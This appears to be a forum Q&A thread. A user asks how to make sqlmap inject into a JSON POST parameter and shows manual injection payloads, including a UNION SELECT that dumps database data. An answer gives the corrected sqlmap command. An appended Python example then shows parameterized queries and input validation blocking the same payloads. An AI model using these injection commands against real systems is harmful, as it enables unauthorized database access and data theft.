1

I want to perform SQL injection but I don't know how to use the command. So far, I have tried this:

--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv

I use ' instead of " in the parameter because sqlmap POST data should be in --data="parameter goes here" format.

But the last verbose output shows:

{'user_id':'6','\'user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#''}

It should be:

{'user_id':'6','user_with:5 OR user_to = 5) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#'}

Here is my manual way:

{"user_id":"6","user_with":"5"} -> return normal
{"user_id":"6","user_with":"5'"} -> return `You have an error...`
{"user_id":"6","user_with":"5 OR user_to = 5) union select version(),2,3,4,5,6#"} -> return dump data

So how do I perform what I want in sqlmap?

Anders
Dark Cyber

1 Answer

0

sqlmap automatically detects the JSON payload and tries to inject, so instead of the above-mentioned payload:

--data="{'user_id':'6','user_with:5*'}" --prefix=" OR user_to = 5)" --suffix="#" -vvv

use the following payload:

--data="{\"user_id\":\"6\",\"user_with:5\"}" --prefix=" OR user_to = 5)" --suffix="#" -vvv

You need not use ' instead of " to use a JSON parameter with sqlmap; escaping is enough.

Aayush
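For the defending side, an added example that is not part of the original question or answer: the three manual request bodies from the question, run against a handler that validates both ids and binds them as query parameters. The `messages` table, the query and the function names are assumptions made for illustration, and SQLite stands in for the application's real database.

```python
import json
import sqlite3

def make_db():
    # Constructed sample data; the table layout is an assumption.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, "
               "user_from INTEGER, user_to INTEGER, body TEXT)")
    db.executemany(
        "INSERT INTO messages (user_from, user_to, body) VALUES (?, ?, ?)",
        [(6, 5, "hi"), (5, 6, "hello"), (7, 5, "private")])
    return db

# Placeholders only: request values never become part of the SQL text.
QUERY = ("SELECT body FROM messages "
         "WHERE (user_from = :me AND user_to = :other) "
         "OR (user_from = :other AND user_to = :me) ORDER BY id")

def as_user_id(value):
    """Accept a plain decimal id given as a JSON number or string."""
    if isinstance(value, int) and not isinstance(value, bool):
        return value
    if isinstance(value, str) and value.isascii() and value.isdigit():
        return int(value)
    raise ValueError("id must be a decimal integer")

def fetch_conversation(db, raw_body, validate=True):
    """Handle a JSON body with the question's user_id / user_with fields."""
    body = json.loads(raw_body)
    if not isinstance(body, dict):
        raise ValueError("expected a JSON object")
    me, other = body.get("user_id"), body.get("user_with")
    if validate:
        # Layer 1: reject anything that is not an integer id.
        me, other = as_user_id(me), as_user_id(other)
    # Layer 2: bound parameters are compared as data, never parsed as SQL.
    rows = db.execute(QUERY, {"me": me, "other": other})
    return [r[0] for r in rows]

# The three request bodies from the question's manual test.
NORMAL = '{"user_id":"6","user_with":"5"}'
QUOTE = '{"user_id":"6","user_with":"5\'"}'
UNION = ('{"user_id":"6","user_with":'
         '"5 OR user_to = 5) union select version(),2,3,4,5,6#"}')
```

With `validate=False` the bound parameter alone still keeps the payload from reaching the SQL parser: the query returns no rows instead of a syntax error or dumped data.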